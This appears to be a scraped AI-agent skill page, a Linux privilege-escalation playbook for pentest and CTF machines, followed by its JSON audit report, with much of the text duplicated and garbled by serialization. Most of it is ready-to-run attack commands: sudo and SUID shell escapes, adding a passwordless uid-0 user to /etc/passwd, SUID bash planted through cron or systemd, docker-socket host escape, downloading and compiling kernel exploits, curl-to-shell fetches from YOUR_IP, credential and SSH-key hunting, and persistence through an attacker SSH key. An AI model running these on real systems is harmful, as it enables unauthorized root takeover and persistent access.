Privilege Escalation Knowledge Base Purpose This knowledge base provides comprehensive privilege escalation methodologies for Linux systems. It covers escalating from low-privilege users (www-data, user) to root, then capturing the root flag. Layered Privilege Escalation Strategy Core Principle: Escalate systematically through 3 layers - from quick wins to exhaustive enumeration. Layer Framework: Escalation Triggers: - Layer 1 finds nothing obvious → Run Layer 2 enumeration - Layer 2 finds vectors but exploitation fails → Try Layer 3 alternatives - Layer 3 fails → Re-examine reconnaissance, m…

\n```\n\n### Update State\n\n```bash\n# Save root flag\nROOT_FLAG=$(cat /root/root.txt)\necho \"Root flag: $ROOT_FLAG\"\n\n# Update state file (if accessible)\njq --arg flag \"$ROOT_FLAG\" '.flags.root = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json\n```\n\n## Troubleshooting\n\n### Can't Download Tools\n\n```bash\n# Method 1: Python HTTP server (on attacker)\npython3 -m http.server 8000\n\n# Method 2: Base64 transfer\n# On attacker:\nbase64 linpeas.sh | xclip -selection clipboard\n# On target:\necho 'BASE64_STRING' | base64 -d > linpeas.sh\n\n# Method 3: Use built-in tools only\n# Manual enumeration with find, grep, etc.\n```\n\n### No Write Permissions\n\n```bash\n# Try /tmp\ncd /tmp\n# Or /dev/shm\ncd /dev/shm\n# Or current user home\ncd ~\n```\n\n### Stuck/No Vectors Found\n\n```bash\n# Re-run enumeration more carefully\n# Check linpeas output for anything yellow/red\ncat linpeas-output.txt | grep -E \"PEASS|95%|99%\"\n\n# Check for overlooked vectors:\n# 1. Environment variables with passwords\nenv | grep -i \"pass\\|pwd\\|key\"\n\n# 2. Process command lines\nps auxww | grep -i \"password\\|pass\"\n\n# 3. World-writable scripts\nfind / -perm -002 -type f 2>/dev/null\n\n# 4. Misconfigured files\nls -la /etc/shadow /etc/passwd\n\n# 5. Backup files\nfind / -name \"*.bak\" -o -name \"*.backup\" 2>/dev/null\n```\n\n## Output Format\n\nAfter successful privilege escalation:\n\n```json\n{\n \"status\": \"root_access_gained\",\n \"method\": \"Sudo vim exploitation via GTFOBins\",\n \"vector\": \"sudo -l showed vim with NOPASSWD\",\n \"root_flag\": \"f6e5d4c3b2a1098765432109876543210\",\n \"exploitation_time\": \"2 minutes\",\n \"mission_complete\": true\n}\n```\n\n## Success Criteria\n\nMission complete when:\n1. ✅ Root access obtained (uid=0)\n2. ✅ Root flag located and read\n3. ✅ Flag is 32-character hexadecimal string\n4. ✅ Both user and root flags captured\n5. ✅ State file updated with both flags\n\n## Decision Tree\n\n```\nInitial Access Gained\n│\n├─ Run: sudo -l\n│ ├─ Can sudo something? → GTFOBins → Root\n│ └─ No sudo → Continue\n│\n├─ Find SUID binaries\n│ ├─ Found unusual SUID? → GTFOBins → Root\n│ └─ No exploitable SUID → Continue\n│\n├─ Check capabilities\n│ ├─ cap_setuid on python/perl? → Exploit → Root\n│ └─ No caps → Continue\n│\n├─ Check cron jobs\n│ ├─ Writable script run as root? → Backdoor → Wait → Root\n│ └─ No cron → Continue\n│\n├─ Run linpeas\n│ └─ Follow red/yellow findings\n│\n└─ Kernel exploit (last resort)\n └─ Search and compile exploit\n```\n\n## Key Principles\n\n1. **Systematic approach** - Don't skip steps, check everything\n2. **Quick wins first** - sudo before kernel exploits\n3. **GTFOBins is your friend** - Use it for SUID/sudo\n4. **Verify before claiming** - Ensure you have actual root\n5. **Capture the flag** - Read root.txt content, not just location\n6. **Non-interactive aware** - Some exploits need TTY, adapt accordingly\n\n## Remember\n\n- Most playground machines have obvious privesc vectors\n- Sudo misconfigurations are most common\n- SUID binaries are second most common\n- Kernel exploits are rarely needed in playgrounds\n- The root flag MUST be read - don't declare success without it\n- Document successful method for learning and future reference\n\n## Mission Complete\n\nWhen you can execute:\n```bash\n# whoami\nroot\n# cat /root/root.txt\na1b2c3d4e5f6789... (32-char hex)\n```\n\nMission accomplished! Update coordinator with both flags.\n---","attachment_filenames":["skill-report.json"],"attachments":[{"filename":"skill-report.json","content":"{\n \"schema_version\": \"2.0\",\n \"meta\": {\n \"generated_at\": \"2026-01-16T22:03:50.876Z\",\n \"slug\": \"charleskozel-privilege-escalation-knowledge\",\n \"source_url\": \"https://github.com/CharlesKozel/Pentest-Agent-Evalulator/tree/main/agents/claude-tbug/skills/privesc\",\n \"source_ref\": \"main\",\n \"model\": \"claude\",\n \"analysis_version\": \"3.0.0\",\n \"source_type\": \"community\",\n \"content_hash\": \"9526b045770c093aa86b6eda314011c4a3e33d114d36f55e9b4ddda40c721082\",\n \"tree_hash\": \"43d97af512f25a13aae0112595cfd77b7fa58fb87259704905dc1f4e7d244ce4\"\n },\n \"skill\": {\n \"name\": \"privilege-escalation-knowledge\",\n \"description\": \"Comprehensive knowledge about Linux privilege escalation. Provides methodologies for enumerating and exploiting privesc vectors including SUID binaries, sudo permissions, capabilities, kernel exploits, cron jobs, and common misconfigurations. Includes systematic approach to capturing root flags.\",\n \"summary\": \"Comprehensive knowledge about Linux privilege escalation. Provides methodologies for enumerating and...\",\n \"icon\": \"🔐\",\n \"version\": \"1.0.0\",\n \"author\": \"CharlesKozel\",\n \"license\": \"MIT\",\n \"category\": \"security\",\n \"tags\": [\n \"privilege-escalation\",\n \"linux\",\n \"penetration-testing\",\n \"security\",\n \"ethical-hacking\"\n ],\n \"supported_tools\": [\n \"claude\",\n \"codex\",\n \"claude-code\"\n ],\n \"risk_factors\": [\n \"external_commands\",\n \"filesystem\",\n \"network\"\n ]\n },\n \"security_audit\": {\n \"risk_level\": \"safe\",\n \"is_blocked\": false,\n \"safe_to_publish\": true,\n \"summary\": \"Pure documentation/knowledge file (SKILL.md) containing educational security content. Static analyzer incorrectly flagged documentation of security concepts as threats. Contains shell command examples in markdown code blocks only - no executable code exists. This is legitimate security education equivalent to GTFOBins, OSCP materials, and security certification coursework. Requires existing initial access for authorized testing only.\",\n \"risk_factor_evidence\": [\n {\n \"factor\": \"external_commands\",\n \"evidence\": [\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 1,\n \"line_end\": 552\n }\n ]\n },\n {\n \"factor\": \"filesystem\",\n \"evidence\": [\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 1,\n \"line_end\": 552\n }\n ]\n },\n {\n \"factor\": \"network\",\n \"evidence\": [\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 6,\n \"line_end\": 278\n }\n ]\n }\n ],\n \"critical_findings\": [],\n \"high_findings\": [],\n \"medium_findings\": [],\n \"low_findings\": [],\n \"dangerous_patterns\": [],\n \"files_scanned\": 2,\n \"total_lines\": 733,\n \"audit_model\": \"claude\",\n \"audited_at\": \"2026-01-16T22:03:50.876Z\"\n },\n \"content\": {\n \"user_title\": \"Escalate Linux privileges quickly\",\n \"value_statement\": \"Privilege escalation is complex and time-consuming. This knowledge base provides systematic methods to identify and exploit Linux privesc vectors including SUID binaries, sudo permissions, and kernel exploits.\",\n \"seo_keywords\": [\n \"privilege escalation\",\n \"linux security\",\n \"sudo abuse\",\n \"suid binaries\",\n \"penetration testing\",\n \"ethical hacking\",\n \"security research\",\n \"claude code\",\n \"claude\",\n \"openai codex\"\n ],\n \"actual_capabilities\": [\n \"Systematic privilege escalation methodology with layered approach\",\n \"SUID binary identification and exploitation techniques\",\n \"Sudo permission abuse patterns and GTFOBins integration\",\n \"Capability enumeration and exploitation methods\",\n \"Cron job vulnerability assessment and exploitation\",\n \"Kernel exploit identification and verification\"\n ],\n \"limitations\": [\n \"Does not include pre-compiled exploits or binaries\",\n \"Requires existing initial access to target system\",\n \"Does not bypass modern security controls like SELinux/AppArmor\",\n \"Does not cover Windows privilege escalation\"\n ],\n \"use_cases\": [\n {\n \"target_user\": \"Security professionals\",\n \"title\": \"Learn privesc techniques\",\n \"description\": \"Systematic approach to privilege escalation for penetration testing engagements.\"\n },\n {\n \"target_user\": \"CTF participants\",\n \"title\": \"Solve privesc challenges\",\n \"description\": \"Step-by-step methodology for solving Linux privilege escalation CTF challenges.\"\n },\n {\n \"target_user\": \"Security researchers\",\n \"title\": \"Document escalation paths\",\n \"description\": \"Reference guide for identifying and documenting privilege escalation vectors.\"\n }\n ],\n \"prompt_templates\": [\n {\n \"title\": \"Basic sudo check\",\n \"scenario\": \"Check sudo permissions\",\n \"prompt\": \"Check what commands I can run with sudo -l and identify exploitable binaries using GTFOBins.\"\n },\n {\n \"title\": \"SUID enumeration\",\n \"scenario\": \"Find SUID binaries\",\n \"prompt\": \"Find all SUID binaries on this system and identify which ones can be exploited for privilege escalation.\"\n },\n {\n \"title\": \"Automated enumeration\",\n \"scenario\": \"Run linpeas scan\",\n \"prompt\": \"Download and run linpeas.sh to perform comprehensive privilege escalation enumeration. Highlight all red and yellow findings.\"\n },\n {\n \"title\": \"Kernel exploit search\",\n \"scenario\": \"Identify kernel vulnerabilities\",\n \"prompt\": \"Check the kernel version and search for applicable kernel exploits. Explain the exploitation process and risks.\"\n }\n ],\n \"output_examples\": [\n {\n \"input\": \"I have initial access as www-data. Help me escalate to root.\",\n \"output\": [\n \"Starting privilege escalation assessment...\",\n \"1. Checking sudo permissions (sudo -l) - no results\",\n \"2. Enumerating SUID binaries - found /usr/bin/vim\",\n \"3. Vim has GTFOBins exploit: sudo vim -c ':!/bin/sh'\",\n \"4. Exploiting vim to get root shell\",\n \"5. Verifying root access: uid=0(root) gid=0(root)\",\n \"6. Reading root flag: /root/root.txt\",\n \"SUCCESS: Root access gained in 2 minutes\"\n ]\n }\n ],\n \"best_practices\": [\n \"Always verify root access with id or whoami before claiming success\",\n \"Document successful exploitation methods for learning and reporting\",\n \"Use GTFOBins to validate SUID and sudo exploitation techniques\"\n ],\n \"anti_patterns\": [\n \"Do not run kernel exploits without understanding potential system crashes\",\n \"Avoid guessing passwords instead of enumerating proper vectors\",\n \"Do not skip quick wins like sudo and SUID checks before complex methods\"\n ],\n \"faq\": [\n {\n \"question\": \"What systems does this knowledge work on?\",\n \"answer\": \"This knowledge focuses on Linux privilege escalation. Windows systems require different techniques not covered here.\"\n },\n {\n \"question\": \"What initial access level is required?\",\n \"answer\": \"Basic shell access as any unprivileged user (www-data, user, etc.) is sufficient to begin enumeration.\"\n },\n {\n \"question\": \"How long does typical escalation take?\",\n \"answer\": \"Layer 1 (quick wins) takes 2-5 minutes. Layer 2 (linpeas) takes 5-15 minutes. Layer 3 varies.\"\n },\n {\n \"question\": \"Is this safe to use on production systems?\",\n \"answer\": \"No. This is for authorized penetration testing and CTF environments only. Always obtain proper authorization.\"\n },\n {\n \"question\": \"Does this work on containers?\",\n \"answer\": \"Limited. Container escapes require specific conditions (docker socket access, privileged containers). See the Docker escape section.\"\n },\n {\n \"question\": \"How does this differ from automated tools?\",\n \"answer\": \"This knowledge guides systematic manual enumeration. Automated tools like linpeas complement but do not replace methodology.\"\n }\n ]\n },\n \"file_structure\": [\n {\n \"name\": \"SKILL.md\",\n \"type\": \"file\",\n \"path\": \"SKILL.md\",\n \"lines\": 552\n }\n ]\n}\n","content_type":"application/json; charset=utf-8","language":"json","size":8399,"content_sha256":"fedda8e20fff5de14a2d3905bc6266691960a6ca7b39add9807eb6c8033ce5ff"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Privilege Escalation Knowledge Base","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Purpose","type":"text"}]},{"type":"paragraph","content":[{"text":"This knowledge base provides comprehensive privilege escalation methodologies for Linux systems. It covers escalating from low-privilege users (www-data, user) to root, then capturing the root flag.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Layered Privilege Escalation Strategy","type":"text"}]},{"type":"paragraph","content":[{"text":"Core Principle:","type":"text","marks":[{"type":"strong"}]},{"text":" Escalate systematically through 3 layers - from quick wins to exhaustive enumeration.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Layer Framework:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Layer 1 (Quick Wins - Manual):\n - Check most common vectors immediately\n - Goal: Find easy privesc within 2-3 minutes\n - Focus: sudo -l, SUID, obvious misconfigurations\n - Time: 2-5 minutes\n\nLayer 2 (Deep Enumeration - Automated):\n - Run comprehensive enumeration tools\n - Goal: Find all possible privesc vectors\n - Focus: linpeas, linenum, pspy\n - Time: 5-15 minutes\n\nLayer 3 (Alternative Methods):\n - Try less common vectors or kernel exploits\n - Goal: Find overlooked or complex privesc paths\n - Focus: Kernel exploits, container escape, NFS, etc.\n - Time: Variable","type":"text"}]},{"type":"paragraph","content":[{"text":"Escalation Triggers:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Layer 1 finds nothing obvious → Run Layer 2 enumeration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Layer 2 finds vectors but exploitation fails → Try Layer 3 alternatives","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Layer 3 fails → Re-examine reconnaissance, may have missed service/config","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Core Strategy","type":"text"}]},{"type":"paragraph","content":[{"text":"Systematic execution:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Quick Wins","type":"text","marks":[{"type":"strong"}]},{"text":" (Layer 1): Check easy vectors first (sudo, SUID, capabilities)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Deep Enumeration","type":"text","marks":[{"type":"strong"}]},{"text":" (Layer 2): Use automated tools to find all vectors","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Alternative Vectors","type":"text","marks":[{"type":"strong"}]},{"text":" (Layer 3): Kernel exploits, container escape, NFS","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exploitation","type":"text","marks":[{"type":"strong"}]},{"text":": Execute chosen privesc method","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Root Flag","type":"text","marks":[{"type":"strong"}]},{"text":": Locate and read root.txt","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verification","type":"text","marks":[{"type":"strong"}]},{"text":": Confirm root access with ","type":"text"},{"text":"id","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"whoami","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Tools Available","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Enumeration Scripts","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"linpeas.sh","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Comprehensive automated enumeration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"linenum.sh","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Alternative enumeration script","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"pspy","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Monitor processes without root","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Manual Commands","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"sudo -l","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Check sudo permissions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"find / -perm -4000 2>/dev/null","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Find SUID binaries","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"getcap -r / 2>/dev/null","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Find capabilities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"crontab -l","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Check user cron jobs","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"cat /etc/crontab","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Check system cron jobs","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GTFOBins (https://gtfobins.github.io/) - SUID/sudo exploitation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PayloadsAllTheThings - Privesc cheatsheet","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Enumeration Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 1: Quick Manual Checks","type":"text"}]},{"type":"paragraph","content":[{"text":"Execute these immediately:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# 1. Check current user and groups\nid\ngroups\n\n# 2. Check sudo permissions (most common vector)\nsudo -l\n\n# 3. Check SUID binaries\nfind / -perm -4000 -type f 2>/dev/null\n\n# 4. Check writable files in /etc\nfind /etc -writable -type f 2>/dev/null\n\n# 5. Check for interesting files\nls -la /home/*/\nls -la /root/\nls -la /opt/\nls -la /var/www/html/\n\n# 6. Check running processes\nps aux | grep root\n\n# 7. Check cron jobs\ncat /etc/crontab\nls -la /etc/cron.*\ncrontab -l\n\n# 8. Check capabilities\ngetcap -r / 2>/dev/null","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 2: Automated Enumeration","type":"text"}]},{"type":"paragraph","content":[{"text":"Download and run linpeas:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Download linpeas\ncd /tmp\nwget http://YOUR_IP:8000/linpeas.sh\n# Or\ncurl http://YOUR_IP:8000/linpeas.sh -o linpeas.sh\n\n# Make executable\nchmod +x linpeas.sh\n\n# Run and save output\n./linpeas.sh > linpeas-output.txt 2>&1\n\n# Review output\ncat linpeas-output.txt | grep -i \"PEASS\\|password\\|ssh\\|priv\"","type":"text"}]},{"type":"paragraph","content":[{"text":"If can't download, use one-liner:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common Privilege Escalation Vectors","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"1. Sudo Abuse (Most Common)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check what you can run as root\nsudo -l\n\n# Common exploitable commands:\n# - vim: sudo vim -c ':!/bin/sh'\n# - nano: sudo nano, then Ctrl+R Ctrl+X, type: reset; sh 1>&0 2>&0\n# - less: sudo less /etc/profile, then !sh\n# - man: sudo man man, then !sh\n# - find: sudo find . -exec /bin/sh \\; -quit\n# - awk: sudo awk 'BEGIN {system(\"/bin/sh\")}'\n# - perl: sudo perl -e 'exec \"/bin/sh\";'\n# - python: sudo python -c 'import pty;pty.spawn(\"/bin/bash\")'\n# - git: sudo git -p help config, then !sh\n\n# GTFOBins template:\n# 1. Identify binary you can sudo\n# 2. Search GTFOBins for that binary\n# 3. Follow exploitation steps","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2. SUID Binaries","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Find SUID binaries\nfind / -perm -4000 -type f 2>/dev/null\n\n# Compare with standard SUID binaries\n# Unusual ones are interesting\n\n# Common exploitable SUID binaries:\n# - /usr/bin/python\n# - /usr/bin/perl\n# - /usr/bin/php\n# - /usr/bin/vim\n# - /usr/bin/find\n# - /usr/bin/nmap (old versions)\n# - Custom binaries\n\n# Exploitation examples:\n\n# Python SUID\n/usr/bin/python -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'\n\n# Vim SUID\n/usr/bin/vim -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n\n# Find SUID\n/usr/bin/find . -exec /bin/sh -p \\; -quit\n\n# Check GTFOBins for specific binary","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"3. Capabilities","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Find capabilities\ngetcap -r / 2>/dev/null\n\n# Exploitable capabilities:\n# - cap_setuid+ep on python/perl/ruby\n# - cap_dac_read_search for reading any file\n\n# Python with cap_setuid\n/usr/bin/python3 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\n\n# Perl with cap_setuid\n/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/bash\";'","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"4. Writable /etc/passwd","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check if /etc/passwd is writable\nls -la /etc/passwd\n\n# If writable, add root user\necho 'hacker:$6$salt$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd\n\n# Or simpler (password: hacker)\necho 'hacker::0:0:root:/root:/bin/bash' >> /etc/passwd\n\n# Login as new root user\nsu hacker","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"5. Cron Jobs","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check cron jobs\ncat /etc/crontab\nls -la /etc/cron.*\n\n# Look for:\n# 1. Scripts run as root\n# 2. Writable by your user\n\n# If found writable script run by root\necho '#!/bin/bash\\nchmod +s /bin/bash' > /path/to/script.sh\n\n# Wait for cron to run (check schedule)\n# Then execute\n/bin/bash -p","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"6. Writable Service Files","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check for writable systemd services\nfind /etc/systemd/system/ -writable 2>/dev/null\n\n# If found, modify ExecStart\n[Service]\nExecStart=/bin/bash -c 'chmod +s /bin/bash'\n\n# Restart service\nsystemctl restart vulnerable.service\n\n# Execute SUID bash\n/bin/bash -p","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"7. Kernel Exploits (Last Resort)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check kernel version\nuname -a\nuname -r\n\n# Search for kernel exploits\nsearchsploit \"linux kernel $(uname -r)\"\nsearchsploit \"ubuntu privilege escalation\"\n\n# Common kernel exploits:\n# - DirtyCOW (CVE-2016-5195)\n# - Dirty Pipe (CVE-2022-0847)\n# - PwnKit (CVE-2021-4034)\n\n# Example: Dirty Pipe\nwget http://YOUR_IP:8000/dirtypipe.c\ngcc dirtypipe.c -o dirtypipe\n./dirtypipe","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"8. Docker/Container Escape","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check if in Docker\nls -la /.dockerenv\ncat /proc/1/cgroup | grep docker\n\n# If docker socket is accessible\nfind / -name docker.sock 2>/dev/null\n\n# If found /var/run/docker.sock\ndocker run -v /:/mnt --rm -it alpine chroot /mnt sh\n\n# Or check for privileged container\nfdisk -l\n# If you can see host disks, you're privileged","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"9. Credentials in Files","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Search for passwords\ngrep -r \"password\" /var/www/html/ 2>/dev/null\ngrep -r \"pass\" /etc/ 2>/dev/null\nfind / -name \"*.config\" -o -name \"*.conf\" 2>/dev/null | xargs grep -i \"password\"\n\n# Check history files\ncat ~/.bash_history\ncat /home/*/.bash_history 2>/dev/null\n\n# Check for SSH keys\nfind / -name id_rsa 2>/dev/null\nfind / -name authorized_keys 2>/dev/null\n\n# Database credentials\ncat /var/www/html/config.php\ncat /var/www/html/wp-config.php","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"10. NFS Exports","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check NFS exports\ncat /etc/exports\n\n# If no_root_squash is set\n# Mount on attacker machine:\nmkdir /tmp/mount\nmount -t nfs TARGET:/share /tmp/mount\n# Create SUID binary as root on attacker\ncp /bin/bash /tmp/mount/bash\nchmod +s /tmp/mount/bash\n# Execute on target\n/share/bash -p","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Exploitation Process","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 1: Identify Vector","type":"text"}]},{"type":"paragraph","content":[{"text":"Based on enumeration, choose best vector:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Sudo permissions","type":"text","marks":[{"type":"strong"}]},{"text":" - Highest priority, usually easiest","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SUID binaries","type":"text","marks":[{"type":"strong"}]},{"text":" - Check against GTFOBins","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Capabilities","type":"text","marks":[{"type":"strong"}]},{"text":" - Less common but powerful","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Cron jobs","type":"text","marks":[{"type":"strong"}]},{"text":" - May require waiting","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Kernel exploits","type":"text","marks":[{"type":"strong"}]},{"text":" - Last resort, can crash system","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 2: Execute Privesc","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Example: Sudo vim exploitation\n\n# 1. Verify you can run it\nsudo -l\n# Output: (root) NOPASSWD: /usr/bin/vim\n\n# 2. Execute vim as root\nsudo vim\n\n# 3. In vim, type:\n:set shell=/bin/bash\n:shell\n\n# 4. Verify root\nid\n# Output: uid=0(root) gid=0(root)","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 3: Stabilize Root Access","type":"text"}]},{"type":"paragraph","content":[{"text":"Once root, ensure you can maintain access:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Add SUID to bash (backup method)\nchmod +s /bin/bash\n\n# Or add SSH key\nmkdir -p /root/.ssh\necho 'YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys\nchmod 600 /root/.ssh/authorized_keys","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Root Flag Capture","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Locate Root Flag","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Common locations\ncat /root/root.txt\ncat /root/flag.txt\n\n# Search if not found\nfind /root -name \"*.txt\" 2>/dev/null\nfind / -name \"root.txt\" 2>/dev/null","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Verify Flag Format","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Should be 32-character hex string\ncat /root/root.txt | wc -c # Should be 33 (32 + newline)\ncat /root/root.txt | grep -E '^[a-f0-9]{32}

Privilege Escalation Knowledge Base Purpose This knowledge base provides comprehensive privilege escalation methodologies for Linux systems. It covers escalating from low-privilege users (www-data, user) to root, then capturing the root flag. Layered Privilege Escalation Strategy Core Principle: Escalate systematically through 3 layers - from quick wins to exhaustive enumeration. Layer Framework: Escalation Triggers: - Layer 1 finds nothing obvious → Run Layer 2 enumeration - Layer 2 finds vectors but exploitation fails → Try Layer 3 alternatives - Layer 3 fails → Re-examine reconnaissance, m…

","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Update State","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Save root flag\nROOT_FLAG=$(cat /root/root.txt)\necho \"Root flag: $ROOT_FLAG\"\n\n# Update state file (if accessible)\njq --arg flag \"$ROOT_FLAG\" '.flags.root = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Can't Download Tools","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Method 1: Python HTTP server (on attacker)\npython3 -m http.server 8000\n\n# Method 2: Base64 transfer\n# On attacker:\nbase64 linpeas.sh | xclip -selection clipboard\n# On target:\necho 'BASE64_STRING' | base64 -d > linpeas.sh\n\n# Method 3: Use built-in tools only\n# Manual enumeration with find, grep, etc.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"No Write Permissions","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Try /tmp\ncd /tmp\n# Or /dev/shm\ncd /dev/shm\n# Or current user home\ncd ~","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Stuck/No Vectors Found","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Re-run enumeration more carefully\n# Check linpeas output for anything yellow/red\ncat linpeas-output.txt | grep -E \"PEASS|95%|99%\"\n\n# Check for overlooked vectors:\n# 1. Environment variables with passwords\nenv | grep -i \"pass\\|pwd\\|key\"\n\n# 2. Process command lines\nps auxww | grep -i \"password\\|pass\"\n\n# 3. World-writable scripts\nfind / -perm -002 -type f 2>/dev/null\n\n# 4. Misconfigured files\nls -la /etc/shadow /etc/passwd\n\n# 5. Backup 